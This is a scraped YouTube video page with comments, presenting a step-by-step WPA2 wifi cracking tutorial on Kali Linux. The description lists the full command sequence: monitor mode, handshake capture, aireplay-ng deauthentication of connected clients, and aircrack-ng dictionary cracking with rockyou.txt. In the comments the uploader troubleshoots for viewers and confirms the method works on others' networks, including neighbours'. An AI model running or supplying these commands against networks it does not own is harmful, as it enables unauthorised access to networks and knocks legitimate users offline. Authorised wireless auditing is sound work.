Hack WIFI using Kali Linux 100% working | Practical Demo |

Поділитися
Вставка
  • Опубліковано 11 кві 2023
  • #NetworkHacking #wifihacking
    This video shows how to hack wifi (wpa2) and try bruteforce attack and even secure wifi.
    Monitoring Mode TP-Link USB Adaptor : • WI-FI- Hacking | TP-li...
    Commands:
    sudo su
    cd /home/kali/Desktop/
    iwconfig
    airmon-ng check kill
    airmon-ng start wlan0
    iwconfig
    airodump-ng wlan0
    airodump-ng --bssid "mac of wifi" --channel 9 --write hack wlan0
    Open New Terminal:
    aireplay-ng --deauth 25 -a "mac of wifi" -e "mac of connected device" wlan0
    cd /home/kali/Desktop/
    if rockyou.txt file is in zipped format:
    gzip -d rockyou.txt.gz
    aircrack-ng hack-01.cap -w /usr/share/wordlists/rockyou.txt
    Dark | Deep | Surface Web : • Dark Web vs Deep Web v...
    WiFi hacking,
    Network security,
    Wireless penetration testing,
    Cracking WiFi password,
    WiFi security vulnerabilities,
    Ethical hacking,
    Man-in-the-middle attack,
    WiFi sniffing,
    Wireless network auditing,
    Password cracking,
    WiFi encryption protocols,
    Brute-force attack,
    Packet sniffing,
    WPA/WPA2 security,
    WiFi cracking tools,
    WiFi hotspot security,
    Wireless network reconnaissance,
    Rogue access points,
    Wireless network intrusion detection,
    WiFi cracking tutorials,
    ► Disclaimer:- [Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use]
    Channel Description :
    Make Easy
    This channel is created to make any concept easier.
    #koolsantosh #makeeasy
    IF This video is helpful then
    ..................................................................
    Like Subscribe Comment & Share
    ..................................................................
  • Наука та технологія

КОМЕНТАРІ • 438

  • @cleberiack5840
    @cleberiack5840 8 місяців тому +21

    Thank you so much for the excellent class. I haven't seen your previous tutorial, but I'll look it up now. I'm from Brazil. Thank you very much.

  • @rdl8620
    @rdl8620 7 місяців тому +104

    it's old way.... depende if you have exact password in the file of passwords, if password is not there, then go to neighbours and ask for password and write it on the file, like that the cracking will be successful

  • @chaostheory3011
    @chaostheory3011 11 місяців тому +45

    It is much easier to just use fern which kali already comes with, does the exact same thing as this except everything is automated.

  • @RohitMourya-nu4uh
    @RohitMourya-nu4uh 10 місяців тому +3

    Can you dencrypt password in handshake file by any other method rather than brute force ? Because by using this method its shows keys not found.

    • @MakeEasyy
      @MakeEasyy  10 місяців тому +6

      You need to make new wordlist using different methods so, you will found your matching password

    • @LTDESP17
      @LTDESP17 4 місяці тому +2

      He's not using a Bruteforce attack he's doing a Wordlist/Dictionary attack. If you have decent hardware learn an actual Bruteforce attack, hybrid attack, phishing, or if AP has WPS version one enabled use reaver.

  • @DavidBanner-gp2wp
    @DavidBanner-gp2wp 8 місяців тому +5

    i have a alfa awus036acs wifi adapter and i cannot get it to work in Kali linux. I have watch several videos and nothing helps
    can you assist

    • @MakeEasyy
      @MakeEasyy  8 місяців тому

      I haven't used that model...

  • @Kezo-cv5uu
    @Kezo-cv5uu 2 місяці тому

    Thanks bro its perfectly working for me❤

  • @user-nb5jl5qb7x
    @user-nb5jl5qb7x Рік тому +2

    Can u help me I can not find any WIFI networks, I have TPlink USB WIFI adapter and it is in Mode:Monitor Frequency, what should be the reason?

    • @MakeEasyy
      @MakeEasyy  Рік тому +1

      Trouble shooting methods:
      1) update and upgrade your system and try again
      2) reinstall drivers for wifi adapter and try again
      3)install fresh os in virtual box or VMware and try again
      NOTE : All the steps are shown in this video so don't skip any part. It will work 100%
      For setup process: ua-cam.com/video/hijn9QMAY_w/v-deo.html

  • @habiburrehman948
    @habiburrehman948 7 місяців тому +2

    Good job but bro please tell me how are you using linux as a pop up window in wondows 10/11
    please reply me as soon as possile

  • @animehunter999
    @animehunter999 11 місяців тому +2

    Do I need to learn programming languages,networking before going into hacking ? Or I can just learn hacking without having knowledge of programming languages

    • @MakeEasyy
      @MakeEasyy  11 місяців тому

      You can start with basic knowledge

  • @shahnawazali1502
    @shahnawazali1502 7 місяців тому +6

    my ssid are not showing, it worked at the first time but when i tried again thoae are not showing again

    • @trippybandz7580
      @trippybandz7580 2 місяці тому

      I have this issue too but I think it needs an adaptor

    • @shahnawazali1502
      @shahnawazali1502 2 місяці тому

      @@trippybandz7580 change the wifi adaptor

  • @yasteseryal609
    @yasteseryal609 7 місяців тому +2

    when put the bsssd and channel then enter the result as airodump --ng for help for help what can i do?🙏

    • @MakeEasyy
      @MakeEasyy  7 місяців тому

      Try again with correct bssid , ND type correct command

  • @Sasan.Mobarez
    @Sasan.Mobarez Рік тому +10

    If it was so easy that all people hacking wirelessly, you put your password in the password list, four to one, you wouldn't do it. If you were, you would hack with a script.

    • @zainmurtaza7118
      @zainmurtaza7118 10 місяців тому +1

      Sir in start when i type (sudu su) then could not find command show in terminal...whats the problem plz guide

    • @sairammoharle
      @sairammoharle 9 місяців тому

      ​@@zainmurtaza7118it's not #sudu su it's #sudo su

    • @gersonesperida4708
      @gersonesperida4708 9 місяців тому

      ​@@zainmurtaza7118it was supposed to be Sudo

    • @novacame9718
      @novacame9718 8 місяців тому

      @@zainmurtaza7118 It's sudo su

    • @GabrielJasonWhitemumba
      @GabrielJasonWhitemumba 8 місяців тому

      okay how

  • @shokirjonov_gaming
    @shokirjonov_gaming 4 місяці тому

    bro that is only hack to connected wifi ?or every wifi
    can you give information about it

  • @azharuddin1st
    @azharuddin1st Місяць тому +1

    i have no wlan0 , only lo and etho is show ............., solve
    this

  • @HubertHafenbrugger
    @HubertHafenbrugger 4 місяці тому

    this method is already obsolete with WPA3. Or with long passwords (not in a list) you can forget that method..

  • @tnunited2436
    @tnunited2436 2 місяці тому +1

    im having trouble on last part the dictionary option -w its written please specify a dictionary. what can i do? to extract the wordlist. thanks if u can make a video on it it would be really appreciated

    • @Abcdefghi506
      @Abcdefghi506 2 місяці тому

      Google search rockyou. Txt

    • @MakeEasyy
      @MakeEasyy  2 місяці тому

      Get rockyou.txt file from github

  • @djnikx1
    @djnikx1 7 місяців тому +4

    🤣 haven't seen such an easy password to crack yet! but the process of cracking it is correct.

    • @MakeEasyy
      @MakeEasyy  7 місяців тому

      Hehehe...
      Thank you

  • @shivam_editz_121
    @shivam_editz_121 Місяць тому +3

    Sir, i try this but showing on me interface wlan0 down and read failed : network is down.

    • @MakeEasyy
      @MakeEasyy  26 днів тому +1

      You need to make network interface up,
      Cmd:
      Ifconfig
      ifconfig wlan0 up

  • @fuel2687
    @fuel2687 7 місяців тому +1

    What if the password is some indian name or something which is personal to the owner? Will it still be able to crack it?

    • @MakeEasyy
      @MakeEasyy  7 місяців тому

      Yup...create wordlist first and then try...it works

  • @mynameshrl
    @mynameshrl Рік тому +7

    means we have to use router to have wlan0? is the handshake file automatically saved to our device after successfully capturing the handshake file?

    • @MakeEasyy
      @MakeEasyy  Рік тому +5

      Yes....
      And You need to use " usb wireless adaptor " which supports monitor mode

    • @abhay4896
      @abhay4896 9 місяців тому +2

      Hey my adapter doesn't support monitor mode
      My adapter is of 2 dollars of zebronics
      But when I asked on discord they share me some driver link
      What is that please tell me

    • @rayrayk4561
      @rayrayk4561 7 місяців тому

      Hi, great tutorial, however im having a problem when I execute ‘airodump-ng -bssid -channel -write hack wlan0’. It shows the specified bssid however next to the time/date there is a “fixed channel wlan0: [number]” and this means when I run the deauth and a WPA handshakes shows it will immediately switch to another channel. This also makes it very difficult to execute the deauth. Any help would be appreciated

  • @GamingWithZarif
    @GamingWithZarif Рік тому

    You crack the same wifi which is already connected to your device..Is it work on others wifi?

    • @MakeEasyy
      @MakeEasyy  Рік тому

      Not the same......... but i tried in my own network...

    • @GamingWithZarif
      @GamingWithZarif Рік тому

      @@MakeEasyy is it work in others wifi?

    • @MakeEasyy
      @MakeEasyy  Рік тому

      Yes absolutely ok

  • @demiladedickson6896
    @demiladedickson6896 6 місяців тому +1

    MUST i be connected by cable cause i am connected to a wifi network . mine did not show wlano

    • @MakeEasyy
      @MakeEasyy  6 місяців тому +2

      It works even if you are connected using wifi

  • @ismailsongadhiya6691
    @ismailsongadhiya6691 4 місяці тому +1

    I run command but it doesn't work it not showing any WiFi connection
    But as I can see in my settings there are 2 WiFi connections are there in my area

  • @user-qs1gd2sp8f
    @user-qs1gd2sp8f 7 місяців тому

    it works only if user already connected on wifi or if not?

    • @MakeEasyy
      @MakeEasyy  7 місяців тому

      Yes a user is required...

  • @fiutt2199
    @fiutt2199 Місяць тому +1

    after typing airodumg-ng wlan0 no wifi network showing

  • @Abhishekaarya026
    @Abhishekaarya026 Рік тому +1

    When I typed the airodump-ng wlan0 command it is showing faild no such devices and failed initilizing wireless card wlan0 ? Please help.

    • @MakeEasyy
      @MakeEasyy  Рік тому +1

      Install drivers firstly by following my another video of enabling monitor mode and follow this video...
      It will be done

    • @puthykun594
      @puthykun594 4 дні тому

      @makeEasyy what's is driver sir?

  • @101onthe9
    @101onthe9 9 місяців тому

    Question , with the iwconfig how do I get the wlan0 to pop up. I’m kinda new to this

    • @MakeEasyy
      @MakeEasyy  9 місяців тому

      If you have connected wifi adapter, then it will be displayed

    • @nandulal5576
      @nandulal5576 8 місяців тому

      ​@@MakeEasyywithout wifi adapter we can hack the password

  • @fact3064
    @fact3064 2 місяці тому +1

    Bro now I have new error 😢
    It is showing that failed to open handshake file which I capture , no such file or directory

    • @MakeEasyy
      @MakeEasyy  2 місяці тому +1

      Write proper folder path...
      Absolute or relative , but it must be correct

  • @christianbasa1391
    @christianbasa1391 9 місяців тому

    It is ok to use the TP-Link N150 TL-WN722N wifi wireless adapater?

    • @MakeEasyy
      @MakeEasyy  9 місяців тому

      Ok..if it supports monitor mode

  • @Manishika_editor
    @Manishika_editor Рік тому

    Can i followed this command if I am using kali linux on virtual machine.

    • @MakeEasyy
      @MakeEasyy  Рік тому

      Yes...u can...I did the same

  • @kreesky
    @kreesky 6 місяців тому +2

    It seems I am unable to capture the handshake. I am deauthing correctly and fixed channel wlan0: is moving however it never captures the handshake. I did see once for a split second "handshake captured" but it went back to the numbers again. Any advice?

    • @MakeEasyy
      @MakeEasyy  6 місяців тому +1

      If your password matches in the Rockyou.txt file, it will capture handshake... and then just stop the process

    • @abhimanyukashyap9828
      @abhimanyukashyap9828 День тому

      How to extract the zip file in the video at 8:27

  • @MR_MRX1
    @MR_MRX1 11 місяців тому +2

    airodump-ng wlan0
    Warning: Detected you are using a non-UNICODE terminal character encoding.
    Failed to connect to generic netlink.
    socket(PF_PACKET) failed: Permission denied
    Failed initializing wireless card(s): wlan0
    Brother gives this error

    • @MakeEasyy
      @MakeEasyy  11 місяців тому +1

      Follow instructions sequentially you won't get error...

  • @sadsad-fv6ep
    @sadsad-fv6ep Рік тому

    I don't have usb wifi adapter how can i follow that command using built-in wireless if im using hyper-v

    • @MakeEasyy
      @MakeEasyy  Рік тому

      Can't using builtin wireless adapter.
      But u can try in virtual machine

  • @roolee2k
    @roolee2k 7 місяців тому

    this is the same question I asked to every "hack wifi kali linux tutorial in UA-cam. You can crack it because you already insert your own password into that rockyou.txt file. What if the password is in another language, made-up word, or even in form of numbers? how do you resolve that ?

    • @MakeEasyy
      @MakeEasyy  6 місяців тому

      this is 2nd process, your question is genuine, we need to create a wordlist first, by gathering information about the person or user.

    • @shivamsaxena8447
      @shivamsaxena8447 5 місяців тому

      Then you have to do bruteforce

  • @LingehMuhamed
    @LingehMuhamed 7 місяців тому +1

    There are limitations here sorry to say, but this works well only if your target has atmost 10 digit pin bcz cracking trying this, and your machine doing the permutation will take till death. if the password or pin is longer and more complicated as you may guess... dictionary attack have a lot of limitations and is time consuming.

    • @MakeEasyy
      @MakeEasyy  7 місяців тому

      Yup, you are right ✅️

  • @GustavJensen30
    @GustavJensen30 4 місяці тому

    When I type "iwconfing" it only displays "lo no wireless extensions.
    eth0 no wireless extensions."
    how come?

    • @tonikidane7101
      @tonikidane7101 4 місяці тому

      to enable wireless functionality in kali u need to install appropriate wireless driver specifically the compact-wireless driver.

  • @real.sirslurpy
    @real.sirslurpy 11 місяців тому +2

    Hello sir. I did everything right but after i put the "airodump-ng" bssid command it only shows the router not the clients when litrelly 4 devices are connected to that network. Please answer with a solution.

    • @MakeEasyy
      @MakeEasyy  11 місяців тому +1

      Restart router and try again...

    • @ayanasim761
      @ayanasim761 9 місяців тому

      First try the command : airmon-ng check kill
      9:41

  • @ucsnow8922
    @ucsnow8922 8 місяців тому

    It gives unable to process this ap what does it means?

  • @shahi2431
    @shahi2431 Рік тому +1

    Is Android Kali Linux and pc Kali Linux both same or not ?

    • @MakeEasyy
      @MakeEasyy  Рік тому +1

      You can use...termux in android to run or execute kali linux commands...
      Its same but some limitations are there...

    • @shahi2431
      @shahi2431 Рік тому

      @@MakeEasyy where are you from bro?

    • @MakeEasyy
      @MakeEasyy  Рік тому

      @@shahi2431 im from nepal

  • @bcseditz1571
    @bcseditz1571 3 місяці тому

    if pass is complicated this will work same ?

    • @MakeEasyy
      @MakeEasyy  3 місяці тому +1

      Yea...need to generate password file....with any available programs

  • @nri_raj
    @nri_raj 5 місяців тому

    I am using this kali in VirtualBox of Mac, do I need external router?

    • @MakeEasyy
      @MakeEasyy  5 місяців тому

      Yes...you need additional usb adapter which supports monitor mode

    • @nri_raj
      @nri_raj 5 місяців тому

      @@MakeEasyy do you know some models?

  • @miniMinn-um9ym
    @miniMinn-um9ym 10 місяців тому +1

    No one: ...
    An Indian youtuber: Saved my life :))

    • @MakeEasyy
      @MakeEasyy  10 місяців тому +1

      Hehehe thanks 😊

  • @3duchannel
    @3duchannel 4 місяці тому +1

    I need an USB wireless antena?

  • @fact3064
    @fact3064 3 місяці тому +1

    Bro can you tell me how to extract file which you are telling at 8:31
    Please bro help me

    • @MakeEasyy
      @MakeEasyy  2 місяці тому +1

      www.google.com/amp/s/www.geeksforgeeks.org/how-to-extract-rockyou-txt-gz-file-in-kali-linux/amp/
      This article will solve your problem

    • @fact3064
      @fact3064 2 місяці тому

      Thanks bro

  • @miladrasoli7866
    @miladrasoli7866 5 місяців тому

    Hey Bro you hacked the wifi that you already connected, did catch my speak? Can we hack our nighbor wifi, is it possiable to hack every wifi?

    • @miladrasoli7866
      @miladrasoli7866 5 місяців тому

      You know why I don't have Kali Linux
      I wanna download it and I wanna be sure that is it possible to hack?

    • @MakeEasyy
      @MakeEasyy  5 місяців тому

      I am not connected to that network.
      And important point is: this is bruteforce attack,
      And in this you must have password list.. or you can generate it using a different methods to do so...
      It works

  • @Nizamul00Mulk
    @Nizamul00Mulk 7 місяців тому +6

    1:58 which key is used in back typing mode?

  • @shaheerhaider-lh7yc
    @shaheerhaider-lh7yc 8 місяців тому +1

    Can i hack without having a USB Wireless Adapter?

  • @VikAsPhogaT
    @VikAsPhogaT 6 місяців тому

    i did not got your last line - w and then wordkist, from where i can get that

    • @MakeEasyy
      @MakeEasyy  6 місяців тому

      for wordlist use link:
      github.com/zacheller/rockyou

  • @leopard_gaming
    @leopard_gaming 11 місяців тому

    External adapter is required?

  • @DIGITALHUBp
    @DIGITALHUBp Рік тому

    my latop is not showing any network in cmd but there are many singnals availble in
    wifi button

    • @MakeEasyy
      @MakeEasyy  Рік тому

      You need extrenal usb wifi adapter....which supports monitor mode..
      Then it will work.
      Normal wifi of laptop won't support monitor mode...

  • @zainmurtaza7118
    @zainmurtaza7118 10 місяців тому

    Sir in start when i type (sudu su) then could not find command show in terminal...whats the problem plz guide

    • @MakeEasyy
      @MakeEasyy  10 місяців тому +1

      It is: sudo su

    • @zainmurtaza7118
      @zainmurtaza7118 10 місяців тому

      ​@@MakeEasyysir when I type (iwconfig) then wlan0 not show..what's the problem please guide

    • @xavy-loco
      @xavy-loco 5 місяців тому

      ​@@zainmurtaza7118😂😂😂

  • @just_a_dreamer369
    @just_a_dreamer369 9 місяців тому +1

    What is the USB device, which showing in the 1:13 ? 🤔

    • @MakeEasyy
      @MakeEasyy  9 місяців тому +1

      Tp link wifi adapter which supports monitor mode

    • @just_a_dreamer369
      @just_a_dreamer369 9 місяців тому

      @@MakeEasyy Thank you !

  • @user-tz9ex5vw8l
    @user-tz9ex5vw8l 2 місяці тому

    do i need any wifi router or adapter while doing these process

    • @MakeEasyy
      @MakeEasyy  2 місяці тому

      Wifi adapter is needed which supports monitor mode

  • @samsung-ws8lr
    @samsung-ws8lr Рік тому

    Try it with inifnite deauth but no handshake happening. Whats the pb plz ?

    • @MakeEasyy
      @MakeEasyy  Рік тому

      Device must retry for the connection...
      So, try with your own Device...
      Disconnect it and connect back again....
      Handshake will be captured....
      #try_thrice

  • @MohammedSabeerCivilEngineering
    @MohammedSabeerCivilEngineering 10 місяців тому

    Bro but while using adapter in monitor mode the network manager service is going off again and again adapter(tp link WN722N

  • @ajwadjilal6831
    @ajwadjilal6831 9 місяців тому

    In the last step its showing “ Please specify a dictionary (option -w) “ whats wrong?

    • @MakeEasyy
      @MakeEasyy  9 місяців тому

      Firstly extract the password file which is in zip format.
      Then goto that directory using CD
      And try again

  • @Aarush4712
    @Aarush4712 Рік тому

    Sir can I try it on a new kali linux as I am using kali linux for first time

  • @kushalkundu2142
    @kushalkundu2142 4 місяці тому +1

    After sudo su root access not show now what what I do?

  • @fuel2687
    @fuel2687 8 місяців тому

    What if I don't have a external wifi adaptor? Is their a method without it?

  • @syedalihaider7144
    @syedalihaider7144 11 місяців тому +3

    After this command
    Airodump-ng wlan0 its scanning networks but under this, Its showing BSSID (not associated) instead of connected device's MAC address.

    • @MakeEasyy
      @MakeEasyy  11 місяців тому +1

      Follow instructions and redo...
      It will work...100%

    • @syedalihaider7144
      @syedalihaider7144 11 місяців тому +1

      @@MakeEasyy tried so many times but failed... I think there's something wrong with my Wifi Chipset. I'll try on another one

    • @shriyanshgupta-5812
      @shriyanshgupta-5812 8 місяців тому

      @@syedalihaider7144 use monitor mode supported wifi adapter

  • @ankushsharma1843
    @ankushsharma1843 11 місяців тому

    How to fix channel changing issue because channel change frequently and that's the reason not capturing handshake

    • @MakeEasyy
      @MakeEasyy  11 місяців тому

      Actually it won't changed..
      Or you can open router settings and configure it..
      Just by typing ip address in the browser

  • @TheRedAd
    @TheRedAd 10 місяців тому +1

    airodump-ng not working .how solve it? when enter not show any wi-fi.

    • @MakeEasyy
      @MakeEasyy  10 місяців тому

      It is inbuilt command so,
      Run update and upgrade command and retry

  • @mohsinvoice
    @mohsinvoice 8 місяців тому

    Bro I face big problem...
    when airodump-ng wlan0 (enter) problem (interface wlan0 down)

    • @MakeEasyy
      @MakeEasyy  8 місяців тому

      Airmon-ng start wlan0
      Run this command

  • @animehunter999
    @animehunter999 11 місяців тому

    Bhai koi course hai kya kali linux mai hacking sikhne ka mujhe to basics bhi nahi ata bas computer chalana ata hai

    • @MakeEasyy
      @MakeEasyy  11 місяців тому

      Course to bahot mil jaege....but apko basics se start karna hoga...

    • @animehunter999
      @animehunter999 11 місяців тому

      @@MakeEasyy karlunga bhai basic se start sikhado bass

  • @SmokeyNagata-lz2xs
    @SmokeyNagata-lz2xs Рік тому

    Does Killer Wi-FI 6 AX 1650i 160MHz support it?

    • @MakeEasyy
      @MakeEasyy  Рік тому

      Check specifications of your adaptor in the internet

  • @Mountainredcandie
    @Mountainredcandie 9 місяців тому

    is it possible to do it without any usb adaptor?

    • @MakeEasyy
      @MakeEasyy  9 місяців тому

      You need adaptor, because adaptor support monitor mode..

    • @Mountainredcandie
      @Mountainredcandie 9 місяців тому

      Thank you so much@@MakeEasyy

  • @rayrayk4561
    @rayrayk4561 7 місяців тому +4

    Hi, great tutorial, however I’m having some problems when i execute “airodump-ng -bssid -channel -write hack wlan0” where it shows everything as it should but also shows a “fixed channel wlan0 [number]” next to the date/time. This number keeps changing very fast as it cycles through channels making executing the deauth command very difficult. Also means if a WPA handshake appears it will immediately disappear as it changes channels. Much appreciated if you could help as I can’t find a solution on the forums. ❤

    • @MakeEasyy
      @MakeEasyy  7 місяців тому +1

      Channel number wont change...
      When handshake captured...
      then exit running command...
      And then process it..
      Execute deauth 15 to 20 times only.

    • @kreesky
      @kreesky 6 місяців тому

      I have the same issue. Any fixes?

    • @CarTody
      @CarTody 5 місяців тому

      Write airodump-ng wlan0 then type everything if solve then comment 💫

    • @kushwaha079
      @kushwaha079 3 місяці тому

      You hv to do only Just buy a wifi connection 😅😅 and fix your problem

  • @chessli369
    @chessli369 4 місяці тому

    Interface wlan0 dow so what we do that not work

  • @Luanlogy
    @Luanlogy 2 місяці тому

    irodump-ng wlan1
    >>>>>>>>
    socket(PF_PACKET) failed: Operation not permitted
    This program requires root privileges.
    Failed initializing wireless card(s): wlan1
    how to solve bro??

    • @MakeEasyy
      @MakeEasyy  2 місяці тому

      Give root user permissions:
      Sudo su

  • @arslannawaz1303
    @arslannawaz1303 Рік тому

    After entering iwconfig there is no wlan0 is showing kindly guide me

    • @MakeEasyy
      @MakeEasyy  Рік тому

      Please connect usb wifi adapter which must support monitor mode.
      Then it will show...
      Please follow instructions shown in video..

  • @funnyreels.98
    @funnyreels.98 2 місяці тому

    I facing a issue "please specify a dictionary (option -w ) " how to fix it ?

    • @MakeEasyy
      @MakeEasyy  2 місяці тому

      Simply extract rockyou.txt file and specify absolute(full) path....then it works

  • @Baati_Gamers
    @Baati_Gamers 7 місяців тому

    sir how to attack the handshake i didn't understand

  • @ayseaf
    @ayseaf 6 місяців тому

    every time i use this command " airodump-ng wlan0 " my network disconnected , why ?

    • @MakeEasyy
      @MakeEasyy  6 місяців тому

      which network?, just restart the network service and try again. using command:
      sudo systemctl restart network.service
      sudo service networking restart

  • @Manishika_editor
    @Manishika_editor Рік тому +2

    What should I do

  • @MohdfuadBamaruddin-dv8bc
    @MohdfuadBamaruddin-dv8bc 3 місяці тому +2

    Tq nice2

  • @zainmurtaza7118
    @zainmurtaza7118 10 місяців тому

    sir when I type (iwconfig) then wlan0 not show..what's the problem please guide

    • @MakeEasyy
      @MakeEasyy  10 місяців тому

      Please follow all the steps ...from beginning it works

    • @xavy-loco
      @xavy-loco 5 місяців тому

      bro you are a pain in the ass!!! 😂😂😂

  • @kailasmore7117
    @kailasmore7117 10 місяців тому

    Great

  • @sohartuahmed8278
    @sohartuahmed8278 7 місяців тому

    Is this only for tp link router?

    • @MakeEasyy
      @MakeEasyy  7 місяців тому

      No, anyone which supports monitor mode..

    • @sohartuahmed8278
      @sohartuahmed8278 7 місяців тому

      How can i supports monitor mode without tp-link usb wifi adaptor

  • @chandrashekarbalajiaeluri1831
    @chandrashekarbalajiaeluri1831 2 дні тому

    Did you used wire less card

  • @toxicshrma3637
    @toxicshrma3637 6 днів тому

    its not showing any ssid when airodump-ng start wlan0 please helps ir

    • @toxicshrma3637
      @toxicshrma3637 6 днів тому

      please help me i think something is stopping my wifi

  • @VikAsPhogaT
    @VikAsPhogaT 6 місяців тому +1

    after iwconfig , wlan0 is not showing

  • @rabbit_os
    @rabbit_os 7 місяців тому

    Which wifi adapter I need to use client was not showing!

    • @MakeEasyy
      @MakeEasyy  7 місяців тому +1

      Tp link wifi adapter which supports monitor mode

  • @johannardox
    @johannardox 10 місяців тому +1

    what happen if the password is not in the wordlist?

    • @MakeEasyy
      @MakeEasyy  10 місяців тому +1

      Need to create wordlist by gathering information about the person

    • @johannardox
      @johannardox 10 місяців тому

      interesting process but I think this method is useless nowadays, on the other hand bruteforce is tediosly slow (it means it is good wifi owners) maybe this is the reason hackers prefers using phishing attacks as a social hacking... Nice video, I learned a lot ! , @@MakeEasyy

  • @leopard_gaming
    @leopard_gaming 11 місяців тому

    After airdump-ng wlan0
    It's failed and reason is device or resource busy so what I do

    • @MakeEasyy
      @MakeEasyy  11 місяців тому

      U need external usb adaptor...
      Which support monitor mode

    • @leopard_gaming
      @leopard_gaming 11 місяців тому

      @@MakeEasyy can you explain in a video?

  • @remil2006
    @remil2006 7 місяців тому

    Hello, when i write iwconfig do not show me any name that star with wlon0

    • @MakeEasyy
      @MakeEasyy  7 місяців тому +1

      You need to connect wireless adapter for that

    • @Cocyared
      @Cocyared 21 день тому

      @@MakeEasyy 😂corectly

  • @Abtechnology0
    @Abtechnology0 7 місяців тому +1

    How I can quitting after I run airodump-ng wlan0

  • @thevideos793
    @thevideos793 10 місяців тому

    after enter SUDO SU what password i do enter?? kindly help please

    • @MakeEasyy
      @MakeEasyy  10 місяців тому +1

      If you are using kali linux.
      Then use kali as password

  • @prasadankit129
    @prasadankit129 11 місяців тому

    If i type iwconfig then it showing only lo and eth0, it is not showing wlan0

    • @user-jx4mq6tw2m
      @user-jx4mq6tw2m 11 місяців тому

      Me too

    • @MakeEasyy
      @MakeEasyy  11 місяців тому

      Do 1 thing...
      First connect your wireless adapter which supports monitor mode to your laptop...
      And attach to virtual machine by watching my previous video... and do configuration.
      Part 1:
      ua-cam.com/video/hijn9QMAY_w/v-deo.html

  • @nihonmaksudur7662
    @nihonmaksudur7662 9 місяців тому

    Why on my pc doesn't recognize commands
    From airodump ng mack address??!

    • @MakeEasyy
      @MakeEasyy  9 місяців тому

      Use - : airodump-ng
      Type correct command...
      It works

  • @TheProgramingTutor
    @TheProgramingTutor 7 місяців тому

    bro will it works on ubuntu?

  • @user-ef9iq5jw7j
    @user-ef9iq5jw7j 6 місяців тому +1

    after iwconfig ......wlan0 not showing !

  • @user-cg2zu1cv6o
    @user-cg2zu1cv6o 9 місяців тому

    I have not get any handshake just show interface wla0 down so what can i do?

    • @MakeEasyy
      @MakeEasyy  9 місяців тому

      Make it up first....
      Wlan0 must be up to capture

    • @MakeEasyy
      @MakeEasyy  9 місяців тому

      Make it up...
      Wlan0 must be up in order to capture handshake file..

    • @user-cg2zu1cv6o
      @user-cg2zu1cv6o 9 місяців тому

      @@MakeEasyy command?

  • @TecheiMouse
    @TecheiMouse 7 місяців тому

    bro I am able to capture the handshake file, but can't find the key,
    I have extracted the rockyou.gzip file but i am unable to crack it says-
    1 potential targets
    Packets contained no EAPOL data; unable to process this AP.
    Quitting aircrack-ng..
    ?? what to do???

    • @MakeEasyy
      @MakeEasyy  6 місяців тому

      firstly extract the worlist, using the command given in video description or any from internet then you can use that file,
      or simply download it:
      github.com/zacheller/rockyou

  • @alialshami3374
    @alialshami3374 6 місяців тому

    Does this work in Ubuntu??

  • @eliastibebu7411
    @eliastibebu7411 7 місяців тому

    thats dictionary word attack not brute force and if it cant find from 14.3 million list it wont show

  • @gorillawarzone4558
    @gorillawarzone4558 4 місяці тому

    i dont have wlan1 or wlan0 on my laptop
    #

  • @yashpalhare8654
    @yashpalhare8654 Рік тому

    i run iwconfig and he showing two wlan0 and wlan1 what problems

    • @MakeEasyy
      @MakeEasyy  Рік тому

      One inbuilt of computer and next USB attached .....so no issue...
      Continue with next steps

    • @yashpalhare8654
      @yashpalhare8654 Рік тому

      But next step follow and they WiFi networks available but he can't scanned wifie networks

  • @user-ks6zz1du1z
    @user-ks6zz1du1z 2 місяці тому +1

    how to get the word list?

    • @MakeEasyy
      @MakeEasyy  2 місяці тому

      Get it from github

    • @user-ks6zz1du1z
      @user-ks6zz1du1z 2 місяці тому

      @@MakeEasyy how do u get the real tek on the usb setting?

  • @bgmi6433
    @bgmi6433 2 місяці тому

    Bro i have to buy the usb adapter😅?

    • @MakeEasyy
      @MakeEasyy  2 місяці тому +1

      Yup...

    • @bgmi6433
      @bgmi6433 2 місяці тому

      Without it ,
      I can't?

    • @giovannis.c.4518
      @giovannis.c.4518 Місяць тому

      @@bgmi6433 I did it with the default network card on my laptop with a live boot kali linux on a usb, maybe my network card supports monitor mode

  • @adibafinance2498
    @adibafinance2498 5 місяців тому

    i dont see any stations on my network